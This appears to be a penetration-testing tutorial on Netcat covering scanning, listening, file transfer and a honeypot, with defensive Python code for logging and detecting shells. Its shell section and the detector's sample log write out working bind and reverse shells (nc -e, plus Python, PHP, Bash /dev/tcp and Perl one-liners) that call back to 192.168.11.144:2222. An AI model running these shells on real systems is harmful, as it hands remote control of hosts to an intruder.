Foreword
Recently, while doing a penetration test, I ran into the problem of listening on a port and getting a shell back, and along the way gained a new appreciation of the tool Netcat. Here is a short summary of how Netcat is used; I hope it helps!
Netcat Overview
Netcat is a very well-known networking tool, abbreviated "nc", and is known as the "Swiss Army knife" of penetration testing. It can be used for port listening, port scanning, remote file transfer, remote shells and more. In short it is powerful, and a humorous saying sums it up: "Your imagination is the only bottleneck of nc."
Netcat Options
Functions: port scanning, port listening, remote file transfer, remote shell, and so on.
Syntax: nc [-hlnruz] [-g <gateway...>] [-G <pointer number>] [-i <delay in seconds>] [-o <output file>] [-p <port>] [-s <source address>] [-v...] [-w <timeout in seconds>] [host name] [port...]
Options:
-g <gateway> set a source-routing gateway hop; up to eight may be given;
-G <pointer number> set the source-routing pointer; the value must be a multiple of 4;
-h online help;
-i <delay in seconds> delay interval between lines sent and between ports scanned;
-l listen mode, for inbound connections;
-n use IP addresses directly, without going through DNS;
-o <output file> write a hex dump of the data sent and received to the file;
-p <port> set the local port the host uses;
-r randomize the local and remote ports;
-s <source address> set the local IP address packets are sent from;
-u use UDP instead of TCP;
-v verbose; show what the command is doing;
-w <timeout in seconds> set the connection wait time;
-z zero-I/O mode, used only for port scanning.
Basic Netcat Usage
Connecting to a remote host
Command: nc -nvv Target_IP Target_Port
Listening on the local host
Command: nc -l -p Local_Port
Port scanning
Check whether a single port on a given host is open
Format: nc -v Target_IP Target_Port
Scan a range of ports on a given host and report which are open
Format: nc -v -z Target_IP Target_Port_Start-Target_Port_End
Scan a range of UDP ports on a given host and report the port information
Format: nc -v -z -u Target_IP Target_Port_Start-Target_Port_End
Scan a range of ports on a given host with the timeout set to 3 seconds
Format: nc -v -z -w 3 Target_IP Target_Port_Start-Target_Port_End
Port listening
Listen on a local port
Format: nc -l -p local_Port
Note: start the listener first (make sure nothing else is already using the port); after that, details of any incoming connection are printed to the command line. Traditional netcat takes the listening port with -p, while the OpenBSD and Ncat variants accept nc -l local_Port.
Listen on a local port and save whatever is received to a file
Format: nc -l -p local_Port > target_File
Connecting to a remote system
Format: nc Target_IP Target_Port
After connecting you can type an HTTP request by hand
Anonymous FTP probing
Format: nc Target_IP 21
File transfer
Sending side:
Format: nc Target_IP Target_Port < Target_File
Receiving side:
Format: nc -l Local_Port > Target_File
Simple chat
Local host
Command: nc -l 8888
Remote host
Command: nc Target_IP Target_Port
Honeypot
Honeypot usage 1:
Command: nc -L -p Port
Note: with the "-L" option nc keeps listening on the port until you press Ctrl+C.
Honeypot usage 2:
Command: nc -L -p Port > log.txt
Note: with "-L" nc keeps listening on the port until Ctrl+C and writes whatever it receives to log.txt; change ">" to ">>" to append to the file instead of overwriting it.
The "-L" option exists in the Windows build; current Linux builds do not have it, though you can look around for one. I only bring it up because I remembered using it before, so this is just a quick mention!
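A small Python listener in the spirit of the honeypot above (an added example, not code from the original post): it keeps listening like "-L", and unlike plain "nc > log.txt" it records the time and peer address of every connection, which is what makes the log usable for triage. LOG_PATH, serve() and demo() are names chosen here.

```python
import os
import socket
from datetime import datetime, timezone

LOG_PATH = "honeypot.log"  # assumed path, playing the role of log.txt above

def record_connection(conn, peer, log_path=LOG_PATH, max_bytes=256):
    """Log one accepted connection: UTC time, peer address and a short preview
    of whatever the client sent first (a banner or probe). Nothing is sent back,
    so the listener cannot be turned into a relay."""
    conn.settimeout(2.0)
    try:
        data = conn.recv(max_bytes)
    except socket.timeout:
        data = b""
    finally:
        conn.close()
    entry = {
        "time": datetime.now(timezone.utc).isoformat(timespec="seconds"),
        "peer": f"{peer[0]}:{peer[1]}",
        "bytes": len(data),
        "preview": data[:64].decode("ascii", "replace"),
    }
    with open(log_path, "a") as fh:  # append, like ">>" in the note above
        fh.write(f"{entry['time']} {entry['peer']} {entry['bytes']}B {entry['preview']!r}\n")
    return entry

def serve(port, host="0.0.0.0", log_path=LOG_PATH):
    """Keep accepting connections, like nc -L, instead of exiting after one."""
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen(8)
        while True:
            conn, peer = srv.accept()
            record_connection(conn, peer, log_path)

def demo():
    """Loopback rehearsal: a constructed client probe against an ephemeral port;
    the log line goes to os.devnull so the demo leaves no file behind."""
    with socket.socket() as srv:
        srv.bind(("127.0.0.1", 0))
        srv.listen(1)
        port = srv.getsockname()[1]
        with socket.create_connection(("127.0.0.1", port)) as client:
            client.sendall(b"GET / HTTP/1.0\r\n\r\n")
            conn, peer = srv.accept()
            return record_connection(conn, peer, log_path=os.devnull)
```

Call serve(8888) to run it for real on the chat example's port; demo() only exercises it over loopback.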
Getting a shell
Overview: there are two kinds of shell, the bind (forward) shell and the reverse shell. If the client connects to the server and wants the server's shell, that is called a bind shell; if the client connects to the server and the server wants the client's shell, that is called a reverse shell.
Bind shell
Local host:
Command: nc Target_IP Target_Port
Target host:
Command: nc -lvp Target_Port -e /bin/sh
Reverse shell
Local host:
Command: nc -lvp Target_Port
Target host:
Command: nc Target_IP Target_Port -e /bin/sh
Special case: the target host has no Netcat, so how do you get a reverse shell?
Usually the target host does not have Netcat installed, so you need an alternative way to connect back to the attacking host. Several reverse shell setups are briefly introduced below.
Python reverse shell
Command executed on the target host:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.11.144",2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
[Screenshots of the local host and the target host are not reproduced here]
PHP reverse shell
Command executed on the target host:
php -r '$sock=fsockopen("192.168.11.144",2222);exec("/bin/sh -i <&3 >&3 2>&3");'
[Screenshots of the local host and the target host are not reproduced here]
Bash reverse shell
Command executed on the target host:
bash -i>&/dev/tcp/192.168.11.144/2222 0>&1
[Screenshots of the local host and the target host are not reproduced here]
Perl reverse shell
Command executed on the target host:
perl -e 'use Socket;$i="192.168.11.144";$p=2222;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
[Screenshots of the local host and the target host are not reproduced here]
Note: when typing these, the single and double quotes must be plain ASCII (English) quotes, or the command will throw an error!
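From the defender's side, the one-liners above all leave a recognisable command line behind. This added example (not from the original post) is a small Python detector that flags those shapes, plus the nc -e form, in process-execution logs and pulls out the callback IP:port for triage. The log format and the SAMPLE_LOG lines are constructed for this example.

```python
import re

# Loose signatures for the reverse-shell one-liners and the nc -e form shown
# above; they tolerate different quoting and spacing rather than exact text.
SIGNATURES = [
    ("nc-exec-shell", re.compile(r"\bnc(?:at)?\b.*\s-[A-Za-z]*e\s+/bin/(?:ba)?sh")),
    ("bash-dev-tcp", re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+")),
    ("python-socket-dup2", re.compile(r"python\S*\s+-c\b.*socket\.socket.*dup2")),
    ("php-fsockopen-exec", re.compile(r"php\s+-r\b.*fsockopen.*(?:exec|system|shell_exec|popen)\(")),
    ("perl-socket-exec", re.compile(r"perl\s+-e\b.*use Socket.*exec\(")),
]
# First IPv4 address followed (within a few non-digit chars) by a port number.
ENDPOINT = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3})\D{1,8}(\d{1,5})")

def extract_endpoint(cmd):
    """Return 'ip:port' of the callback target in a command line, or None."""
    m = ENDPOINT.search(cmd)
    return f"{m.group(1)}:{m.group(2)}" if m else None

def scan_log(text):
    """One finding per log line whose cmd= field matches a signature.
    Log format is constructed: '<time> host=.. uid=.. pid=.. cmd=<command line>'."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        cmd = line.partition("cmd=")[2]
        for name, rx in SIGNATURES:
            if cmd and rx.search(cmd):
                findings.append({"line": n, "rule": name,
                                 "endpoint": extract_endpoint(cmd), "cmd": cmd})
                break
    return findings

# Constructed sample log: the four one-liners from this page plus nc -e,
# interleaved with benign commands that must not fire.
SAMPLE_LOG = """\
10:00:01 host=web01 uid=33 pid=4101 cmd=nc -zv 10.0.0.7 80
10:00:05 host=web01 uid=33 pid=4120 cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.11.144",2222));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
10:00:09 host=web01 uid=33 pid=4133 cmd=python3 -c 'print(sum(range(10)))'
10:01:12 host=web01 uid=33 pid=4140 cmd=php -r '$sock=fsockopen("192.168.11.144",2222);exec("/bin/sh -i <&3 >&3 2>&3");'
10:01:30 host=web01 uid=33 pid=4151 cmd=bash -i >& /dev/tcp/192.168.11.144/2222 0>&1
10:02:02 host=web01 uid=33 pid=4160 cmd=perl -e 'use Socket;$i="192.168.11.144";$p=2222;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
10:02:40 host=web01 uid=0 pid=4177 cmd=nc 10.0.0.5 4444 -e /bin/sh
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['rule']} -> {f['endpoint']}")
```

The signatures are deliberately loose, so expect some tuning against your own baseline; the endpoint extraction is what lets you pivot straight to the network logs for the callback host.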
Summary: one saying goes "review the old and learn the new", and another goes "practice makes perfect". Put the two into practice together and they strike a different spark: you will see what you never saw before and master skills that used to feel foreign. Netcat is of course easy to use, but that too you only find out through practice, so what are you waiting for?
* Author: Fly a bright future; please credit FreeBuf.COM when reposting.